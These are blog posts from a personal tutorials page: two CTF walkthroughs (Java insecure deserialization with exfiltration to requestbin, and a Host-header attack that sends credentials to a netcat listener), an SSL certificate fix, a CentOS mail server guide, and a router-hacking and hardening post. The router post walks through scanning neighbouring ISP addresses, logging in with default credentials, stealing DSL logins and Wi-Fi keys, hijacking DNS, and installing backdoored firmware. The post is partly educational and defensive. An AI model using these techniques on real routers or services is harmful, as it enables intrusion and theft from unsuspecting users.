« Posts under Tutorials

[Sticky]

StackOverCTF – Walk Through – CyberTalents

This was one of the challenges in qualification round for Digital Pakistan Cyber Security Hackathon 2022.
Details:
Category: Web Security
Level: Hard
Points: 200

Steps:
Since this is a web challenge, open the CTF link in web browser (Google Chrome in our case).


The first page shows two links:
1) Post Question
2) Show Latest Question


The Post Question page shows a form with 3 input fields:
1) Question
2) Category
3) Animation


Enter aaaa in question field, bbbb in category and cccc in animation field.
On submission, this page sets a cookie in browser named latest_question with a base64 encoded string.

latest_question=rO0ABXNyACJjb....GFhYWE=

On Kali machine, decode this base64 encoded string:

echo rO0ABXNyACJjb....GFhYWE=|base64 -d

The decoded result is garbage with some readable strings that can be seen in image below:

Base64 Encoded Serialized Object
The presence of java/lang/String in above data confirms that this is basically a serialized java object.
Although the characters rO0 in the beginning of base64 data confirms that its a serialized object but we didn’t noticed that honestly.

Now when we visit the Show Latest Question page, aaaa was displayed.
It means that on this page, the cookie was being base64 decoded, un-serialized and our input question was being printed.

At this point, it was obvious that the vulnerability involved is Insecure Deserialization.
To exploit this vulnerability, one must understand the structure of the object being de-serialized.

To understand the structure of the Java object, we use a tool called SerializationDumper.

Save this object in a file and the use the tool to see the object structure:
echo rO0ABXNyACJjb....GFhYWE=|base64 -d>/tmp/obj01

Using SerializationDumper tool:
java -jar SerializationDumper-v1.13.jar -r /tmp/obj01

As we have the object structure, we need to find the vulnerable function which will lead to code execution.
Now we have two options: We can fuzz the web application by passing different code execution payloads or analyze the application further for possible clues.

On further analysis, a web directory /backup was observed with 2 Java source files:
QuestionController.java
QuestionDebug.java

The QuestionDebug.java file had what we were looking for, the vulnerable function:
Question Debug Java Source Code

Now we needed Java compiler so we could craft the QuestionDebug Java class.

We used Online Java Compiler from jdoodle.com for this purpose as we had no Java Compiler installed on our machine nor we had time for installation during the competition.
Jdoodle Crafted Java Object

After this, we had to generate and decode the final Java object.
Make sure to create the correct Java class hierarchy as show in images.
By using code from QuestionDebug.java and QuestionController.java files, we were able to create the final payload generator.
Jdoodle Java Payload Generator

The value of serialVersionUID should be kept same or the payload will not work.

Used requestbin.net as our HTTP listener so we can receive the output of code execution.

Open the Show Latest Question page in browser, which initially printed aaaa.

Open Developer Console of Chrome by pressing Ctrl+Shift+i and enter the final payload.
Google Chrome Developer Console Cookie

Refreshed the page and our payload got executed as we received the HTTP request on RequestBin.

Flag was present as flag.txt file in home directory.

The files used in this CTF can be download from here:
https://www.asktaimoor.com/stuff/ctf/stackoverctf.zip

If you have any questions, please feel free to ask in comments.

Thanks to CyberTalents for this great challenge 🙂

How To Fix Google Chrome SSL Warning

Starting from September 2021, all the devices using Windows 7 and older Windows OS versions started to give “Invalid SSL Certificate Warning” messages.

As as result, most of the commonly used websites (speedtest.net for instance) stopped opening properly or not loading at all.

After trying multiple solutions online, this one worked for me on multiple Windows 7 systems.

All you need to do is download and install all these SSL CA certificates and install them one by one:
https://secure.globalsign.net/cacert/Root-R1.crt
https://letsencrypt.org/certs/lets-encrypt-r3.pem
https://letsencrypt.org/certs/isrg-root-x2.pem
https://letsencrypt.org/certs/isrgrootx1.pem

Once you have installed all these certificates, just restart your browser and you are good to go.

Now you can test by opening any website that was previously throwing errors.

If you are having any issues, feel free to ask in comments and I’ll be glad to help.

References:
https://www.stephenwagner.com/

Teotihuacan – Walk Through – echoCTF

IP Address: 10.0.30.190
Description: Just like the pyramids of Teotihuacán, this target feels like a step-pyramid
Extra Info: Just like a step-pyramid from Teotihuacán, you have to climb step-by-step until you reach the top. You have to get the following flags

Steps:
Like any other target, we start by simply entering the IP Address in browser.
Opening http://10.0.30.190/ returns a PHP code and anyone with basic PHP skills know what this code does.
Now we enter http://10.0.30.190/?hasAdminAccess=true in browser to get our first flag.
ETSCTF_x

Along with the flag, we got a message that says “The next challenge is located at switch_and_twist” and a link to http://10.0.30.190/switch_and_twist/

Now again we have a piece of PHP code but this time it requires some intermediate PHP skills to understand what this code does.

Using Postman, we have to send the below request:
http://10.0.30.190/switch_and_twist/
hmac=” ”
host=”asdasdasd”
nonce=””
Note: I had to debug this PHP code on local Apache to fully understand its logic.

Now we got our second flag ETSCTF_xx with the message “The next challenge is located at overprinting” and a link to http://10.0.30.190/overprinting/

Again, we are presented with PHP code and this time, it requires basic arithmetic knowledge along with advanced PHP understanding.

After some hit and try, playing with this PHP code on local Apache, we finally get the code required to pass this challenge.
http://10.0.30.190/overprinting/?print=print=111111

As a result, we get our third flag:
“The next challenge is located at /got_creds/ ETSCTF_xxx”

If you really know PHP well, you will notice another logic in this code and so we found another code:
http://10.0.30.190/overprinting/?print=011111

As expected, this code gives us our fourth flag:
“Awesome work, here is anothe flag for your troubles ETSCTF_xxxx”

Now we hit http://10.0.30.190/got_creds/ and get some NodeJS code.
This code is fairly simple and doesn’t require any deep NodeJS skills.

From the NodeJS code we get a link to http://10.0.30.190/got_creds/example

Upon hitting the above link, we get a JSON response with our fifth flag:
{“body”:{“ETSCTF”:”ETSCTF_xxxxx”}}

Now we have no more hints and there is something to do with this NodeJS code:
Upon close inspection, we see a call:
http.get(`http://${req.headers.host}?auth=${JSON.stringify(credentials)}`

Using Postman, we have to send request to http://10.0.30.190/got_creds/example with the “Host” header set to our attacker IP which in our case is “10.10.0.123”

Before sending the above request, we have to run a netcat listener on our attacker machine using the command:
nc -nlvp 80

As soon as we send the request from Postman, we get our sixth and final flag on netcat listener:
ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this CTF 🙂

Complete Guide: Setup Mail Server on CentOS

Mail Server CentOS Postfix Dovecot SquirrelMail
Background
A few days back, I felt this need to have my own mail server setup on my VPS so that I can send and receive emails from my own email account (@AskTaimoor.com). One option I had was to setup CPanel on my VPS but it had its own issues. CPanel is costly and it comes with lots and lots of additional features. Its best for web hosting providers so its none of my use. If you are planning to setup lots of email accounts on lots of domains, you should consider buying CPanel or other commercial products. My requirement was just to setup a few email accounts on a few domains that I personally manage. Also, I always prefer Open Source solutions because of their security and community support.

I followed tutorials on many websites but most of them were outdated and so lead to errors and other issues. After spending hours, I found this one tutorial that was much recent as compared to others but lengthy as hell. Following the steps provided there, I was able to send and receive email from a nice and simple to use web interface. Here I am writing those steps without unnecessary discussion about each and every step, the problems I faced and how I managed to fix those problems.

Limitations
There are a few limitations of this setup that I should point out before I start:

  • Account Management
    You cannot create, delete or modify email accounts directly from the final interface you will get. All the mail accounts map to local user accounts on the underlying Linux system.

  • Password Change
    Passwords of accounts cannot be changed for the same reason. It has to be manually changed from console or using some postfix plugins.

  • Non-Fancy Interface
    The web interface you will get is not stylish yet pretty simple and straight forward. Don’t expect a fancy looking user interface like Hotmail or Gmail.

  • Security
    Although we will be running everything with limited permissions yet there are some security problems with this setup e.g; MITM attacks.

If you are OK with these limitations you can go ahead otherwise go for alternate solutions that I have mentioned above.

Prerequisites

  • Basic Linux Knowledge
    If you don’t know basic Linux terminologies or the basic commands used in Linux you might feel lost. If that’s the case, seek help from a Linux pro.

  • Static IP
    Most VPS and dedicated server providers allot Static IPs. In case you don’t have one or you are setting up on your home server, this simply wont work for you.

  • SSH Access
    You must have SSH access to your server using PuTTy or other means. This is a must so that so can run commands on your server.

  • root Access
    This tutorial assumes that you are the administrator of this server. So you must have root access on your server in order to install anything at all.

Installation Steps
Before you start, make sure you have logged in to SSH and changed to root.

  • Hostname
    Your server’s hostname or FQDN should be the same as your mail address domain name. If you are going for [email protected], your hostname should be mydomain.com.
    To know your current hostname, type hostname in SSH.
    If its not correctly set, change it by entering hostname mydomain.com

  • hosts File
    Enter vi /etc/hosts
    Append this at the file’s end (if its not there already):
    w.x.y.z mydomain.com mydomain www.mydomain.com

  • Reverse DNS
    Your servers’s Public IP address should point to your FQDN. This is not set by default. It has to be configured from your server’s control panel usually or you will need to contact your host provider. Look for rDNS or Reverse DNS or PTR Records or Network Settings in your Server Control Panel.
    Once configured, run the command host w.x.y.z, where w.x.y.z is your server’s public IP address and the result should be:
    z.y.w.x.in-addr.arpa domain name pointer mydomain.com.

  • Setup MX Domain Records
    Add these records in your DNS manually or from your domain control panel:

    mail A w.x.y.z
    mydomain.com. MX 10 mail.mydomain.com.

    Don’t forget your to restart your DNS server if you have entered the records manually.

  • EPEL Repository
    Some components of this setup are not present in default repository. To fix that, we have to add latest EPEL Repository by typing this:

    # make sure to add the proper repo version for your system
    wget http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
    rpm -ivh epel-release-6-8.noarch.rpm

  • Disable SELinux
    To avoid mysterious errors, I suggest turning of SELinux temporarily. Enter this command to do it:
    setenforce 0

  • Setup Mail Accounts
    As pointed out above, all mail accounts point to local Linux user accounts. That means we will need to setup users on our server:

    # for setting up [email protected]
    useradd contact
    passwd contact

  • Setup Postfix
    Postfix is the backbone of this whole setup. Hence it must be installed and configured properly before going any further.

    # to make sure everything is up-to-date.
    yum update

    yum install postfix -y

    # remove sendmail as it conflicts with postfix
    yum remove sendmail -y

    # use your favorite text editor. mine is vi
    vi /etc/postfix/master.cf

    # find this line, un-comment it and change it to look like this:
    submission inet n - n - - smtpd
    -o syslog_name=postfix/submission
    -o smtpd_tls_wrappermode=no
    -o smtpd_tls_security_level = encrypt
    -o smtpd_sasl_auth_enable=yes
    -o smtpd_client_restrictions=permit_mynetworks,permit_sasl_authenticated,reject
    -o milter_macro_daemon_name=ORIGINATING

    # to tell postfix about your hostname
    vi /etc/postfix/main.cf

    # find these lines, un-comment them and change them to look like below:
    myhostname = mail.mydomain.com
    mydomain = mydomain.com
    myorigin = $mydomain
    inet_interfaces = all
    inet_protocols = all
    mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
    mynetworks = localhost, 127.0.0.0/8, w.x.y.z
    home_mailbox = Maildir/

    # to make sure postfix runs on startup
    chkconfig postfix on

    # restart postfix
    service postfix restart

    If you see any errors on starting postfix, that means you have missed something. For error details, enter this command:
    tail -f /var/log/maillog
    Once you are running postfix without any errors, run this command to send a test email to your other email:
    mail my_email@my_isp.com
    Press Ctrl+D to send the mail.
    Now open your mail and check the Inbox or Junk/Spam folder to confirm that your test email has arrived.

  • Setup Dovecot
    yum install dovecot -y

    vi /etc/dovecot/dovecot.conf

    # find this line, un-comment it and change it to look like this:
    protocols = imap pop3 lmtp

    vi /etc/dovecot/conf.d/10-mail.conf

    # find this line, un-comment it and change it to look like this:
    mail_location = maildir:~/Maildir

    vi /etc/dovecot/conf.d/10-auth.conf

    # find these lines, un-comment them and change them to look like below:
    disable_plaintext_auth = yes
    auth_mechanisms = plain login

    vi /etc/dovecot/conf.d/10-master.conf

    # find these lines, un-comment them and change them to look like below:
    user = postfix
    group = postfix

    # run dovecot on startup
    chkconfig dovecot on

    service dovecot start

  • Setup SquirrelMail

    # run squirrelmail wizard
    cd /usr/share/squirrelmail/config/
    ./conf.pl

    # enter 1 to setup your organization details
    # again enter 1 to edit the organization details
    # enter all your details and press S to save them and finally press R to return to main menu

    # enter 2 to setup mail server details
    # again enter 1 to set your domain name (mydomain.com)
    # enter 3 and then enter 2 to change from Sendmail to SMTP

    # finally press S followed by Q to save and exit the squirrelmail wizard

  • Setup Apache
    Apache is installed on most servers by default. If not, install it by typing:

    yum install apache -y

    Once Apache is properly installed, configure it to serve SquirrelMail front-end:

    vi /etc/httpd/conf/httpd.conf

    # add the below lines at the end of line:
    Alias /webmail /usr/share/squirrelmail

    Options Indexes FollowSymLinks
    RewriteEngine On
    AllowOverride All
    DirectoryIndex index.php
    Order allow,deny
    Allow from all

    # restart apache server
    service httpd restart

    Open http://w.x.y.z/webmail in your browser and you will be greeted by SquirrelMail login page like this:
    Mail Server SquirrelMail Frontend Login
    Login with the mail account you previously created.
    If you have reached this point without any errors, pat your self as you have completed 60% of the whole setup.

  • Setup Multiple Accounts
    Postfix allows us to send and receive emails using different email addresses on different domains using a single Linux user account.
    In order to make it work, enter the following commands:

    vi /etc/postfix/main.cf

    # find these lines, un-comment them and change them to look like below:
    virtual_alias_domains = mydomain.com mypersonaldomain.net myofficaldomain.org
    virtual_alias_maps = hash:/etc/postfix/virtual

    vi /etc/postfix/virtual

    # add as many accounts you want at the end of file in this format:
    [email protected] contact
    [email protected] contact
    [email protected] contact
    [email protected] contact
    [email protected] contact

    # every time you edit the virtual file, you must run these commands:
    postmap /etc/postfix/virtual
    postfix reload

    The emails received on the above email accounts will land in the inbox of contact user account. You can setup as many accounts as you wish by mapping them to the local Linux user accounts. But setting up too many accounts is not recommended.

  • Setup SPF Records
    SPF records are used by most Email servers to prevent SPAM. If you don’t have these records chances are that all your sent emails will land in recipient’s junk/spam folder.
    Add this record in your DNS manually or from your domain control panel:

    @ TXT "v=spf1 mx a ip4:w.x.y.z"

    Don’t forget your to restart your DNS server if you have entered the records manually.

  • Setup DKIM Keys
    Just like SPF, DKIM is a mechanism designed to fight email SPAM. Failing to setup these will cause your emails to be caught up by SPAM filters or never reaching the recipients at all. Perform the following to prevent this:

    yum install opendkim -y

    vi /etc/opendkim.conf

    # append the following lines at the file's end:
    AutoRestart Yes
    AutoRestartRate 10/1h
    UMask 002
    Syslog yes
    SyslogSuccess Yes
    LogWhy Yes

    Canonicalization relaxed/simple

    ExternalIgnoreList refile:/etc/opendkim/TrustedHosts
    InternalHosts refile:/etc/opendkim/TrustedHosts
    KeyTable refile:/etc/opendkim/KeyTable
    SigningTable refile:/etc/opendkim/SigningTable

    Mode sv
    PidFile /var/run/opendkim/opendkim.pid
    SignatureAlgorithm rsa-sha256

    UserID opendkim:opendkim

    Socket inet:12301@localhost

    vi /etc/default/opendkim

    # find this line, un-comment it and change it to look like this:
    SOCKET="inet:12301@localhost"

    # configure postfix to use DKIM as mail filter
    vi /etc/postfix/main.cf

    # find these lines, un-comment them and change them to look like below:
    milter_protocol = 2
    milter_default_action = accept
    smtpd_milters = inet:localhost:12301
    non_smtpd_milters = inet:localhost:12301

    # setup dkim directory structure
    mkdir /etc/opendkim
    mkdir /etc/opendkim/keys

    # specify which hosts should be trusted
    vi /etc/opendkim/TrustedHosts

    # append the follow lines at the end of the file:
    w.x.y.z
    *.mydomain.com

    # create a key table
    vi /etc/opendkim/KeyTable

    # append this line at the end of the file:
    mail._domainkey.mydomain.com mydomain.com:mail:/etc/opendkim/keys/mydomain.com/mail.private

    # create signing table
    vi /etc/opendkim/SigningTable

    # append this line at the end of the file:
    *@mydomain.com mail._domainkey.mydomain.com

    # setup public and private keys
    cd /etc/opendkim/keys
    mkdir mydomain.com
    cd mydomain.com
    opendkim-genkey -s mail -d mydomain.com
    chown opendkim:opendkim mail.private

    # open mail.txt and copy the domain record
    vi mail.txt

    # the domain record should look like this (do not use this its just a sample):
    mail._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB
    8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6
    DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE
    hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"

    # restart postfix and opendkim to update the latest changes
    service postfix restart
    service opendkim restart


    Add the above copied record in your DNS manually or from your domain control panel:

    mail._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB
    8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6
    DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE
    hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"

    Don’t forget your to restart your DNS server if you have entered the records manually.

Testing
Once all the above steps are completed, its time to test your newly born mail server.

  • DNS Records
    Verify that all your DNS records are setup properly by typing this command:
    nslookup -type=ANY mydomain.com
    The result should look like below:
    Mail Server Test Nslookup Type Any
    The MX, SPF and DKIM records must be present in the results.

  • Compliance
    To make sure your email server meets the standards and follows the best practices, send an empty email to [email protected] from your SquirrelMail.
    Open http://www.allaboutspam.com/email-server-test-report/index.php in your browser and enter the email from which you sent the empty email ([email protected]) and press enter.
    All the results should be shown in green except the BATV and Greylist check. Like for SPF test, you should see this:
    Mail Server SPF Compliance Test
    Within 10 to 15 minutes, a mail will arrive in your SquirrelMail inbox containing a link ensuring your email server is using the best practices.

  • Gmail, Hotmail and Yahoo!
    Try sending email from your SquirrelMail to the most used email services to test email delivery.
    Do not enter words like “test email” “mail testing” in the subject field or email body. Doing this increases the chances of your emails landing in SPAM folder.
    Enter something creative that doesn’t look like SPAM and your emails will land safely in Gmail’s and Yahoo!’s inbox!
    However in case of Hotmail this isn’t true. Hotmail’s SmartFilter uses IP reputation in addition to other methods to identify potential SPAM. It takes take for SmartFilter before it whitelist your IP. Until then your associates will have to check their Junk folder to find your email.
    Other than that, it works fine with most email services providers worldwide.

  • Debugging
    Following the above steps, if something doesn’t work, you will need to check the following to find the culprit:
    For mail server related problems: tail -f /var/log/maillog
    For DNS server related problems: tail -f /var/named/log/queries.log
    For user authentication related problems: tail -f /var/log/secure
    For other problems: tail -f /var/log/messages

    In case you are having problems following this tutorial, just write in comments and we will sort out the problem!

  • Hacking and Securing DSL Routers

    Introduction:
    (Note: If you know how DSL works, you can jump to the next section!)
    Most of the internet users nowadays are using DSL connections. DSL stands for Digital Subscriber Line which provides internet over telephone lines. DSL uses ADSL Routers or ADSL Modems. Here is a layman diagram of how DSL works:
    how_dsl_works

    Whenever a user turns on their DSL modem, they are connected to the DSLAM which is usually placed inside ISP Exchange. Each DSLAM has the capacity to connect with thousands of DSL users. In above image, it looks like a small box but actually it is much bigger:
    dslam_backside

    DSLAM is responsible for checking the condition of telephone line and assures that a stable connection can be maintained. It also holds some properties for each telephone line. The Download and Upload Rate you see in your modem status page are also set by DSLAM. Once the DSLAM connection is established, the DSL light on some modems is turned on.
    modem_adsl_light_off

    Now the modem sends Internet Access request to the BRAS server. This request contains the DSL username and password which is saved in the DSL modem settings. The login is usually set by the lineman when they install a new DSL connection. The BRAS server is directly connected with the central RADIUS server which contains login information of all DSL users. The RADIUS server also contains a list of IP Addresses which are not used by others. If the login sent by modem is valid, RADIUS server responds with one IP Address from the IP Address list. Once the modem receives the IP Address, an internet connection is established and the internet light on modem is turned on:
    modem_adsl_internet_on

    That was some lengthy introduction about DSL and its working for non-technical people!

    How to Hack:
    After reading the above introduction we know that each DSL connection is assigned a unique Public IP address from a list. This list is basically a range of IP Addresses which is assigned to the ISP by the RIR. We can check our IP Address from here: http://myip.counterstrike.com.pk/. I assume my IP Address is 66.150.150.10. The IP Address we see is basically the IP Address assigned to our modem. What will happen if we change the last part of our IP Address and enter 66.150.150.11 it in web browser?
    ip_connect_error

    Oh. It looks like that IP Address does not belong to any DSL user. Lets try 66.150.150.11:
    router_basic_auth_page
    (Keep increasing the last number of IP Address until you hit a login page. Don’t give up too soon!)

    Looks like we have reached the login page of another DSL users’s modem. The default login for most modems is admin:admin. More default logins are given in next section. Once we login successfully, we have full control over that modem.
    For example:

    • We can steal their DSL login and use their bandwidth:
      modem_wan_ppp_settings

    • Change their DNS Servers and hijack their DNS Requests:
      modem_wifi_key_wpa_psk

    • Steal their Wi-Fi keys:
      modem_wifi_key_wpa_psk

    • Enable DMZ to remotely access internal LAN computers:
      modem_dmz_pic

    • Replace ACS with our own for remote configuration of modem:
      modem_acs_server_attacker

    • Replace modem’s firmware with our own backdoored firmware:
      modem_firmware_backdoor_update

    As you can see, we can do pretty much anything we want with that DSL Router we just owned.

    How to Secure:
    Now that we have learned about the various tricks to exploit the router, lets go through the different ways to secure it:

    • Change Default Router Configuration Password:
      If you have installed a new DSL connection, chances are that your login and password combination is one of the following default logins:
      admin:admin
      support:support
      user:user
      admin:ISP NAME
      admin:LAST 5 HEX CHARACTERS OF MODEM MAC ADDRESS+1
      Always use a strong password that does not include dictionary words.
      Some modems have multiple login accounts so make sure you have changed passwords for all of them:
      modem_default_login_pass

    • Change Default DSL Connection Password:
      Call your ISP helpline and ask them to change your DSL or Broadband or PPP account password.
      If you do not change it, someone else might use it and you will be billed for their download usage.

    • Disable Remote Access to Modem:
      This is to make sure no one can connect to your router from outside your network.
      modem_acl_services_lan_wan_ftp_tftp_snmp_http_icmp_telnet_ssh

    • Disable TR-069 Client:
      If you know how to configure your router, you don’t need your ISP to remotely access your router.
      So you can simply disable it.
      modem_acs_tr069_disable

    • Use Strong Wi-FI Password:
      Always use a strong WPA/PSK key for password. If the attacker is on LAN, means they have your Wi-Fi password, they can easily sniff your router credentials using MITM on your local network.

    • Be Smart:
      If you connect to your Wi-Fi network and the browser opens a page asking for your Wi-Fi password, beware! Someone is trying to hack your Wi-Fi password using Wi-Fi Phishing. This is a new technique and it cannot be prevented directly. All you can do is educate your friends and family about how this works so they should be cautious about these attacks.

    If you follow the above steps, no one can break in to your router remotely or locally.

    Conclusion:
    The sole purpose of writing this post was to spread awareness about security and to educate the internet users and the ISP operators about the different threats they are exposed to.
    So if you suspect that your router might be vulnerable, now is the right time to secure it.

    Better safe than sorry!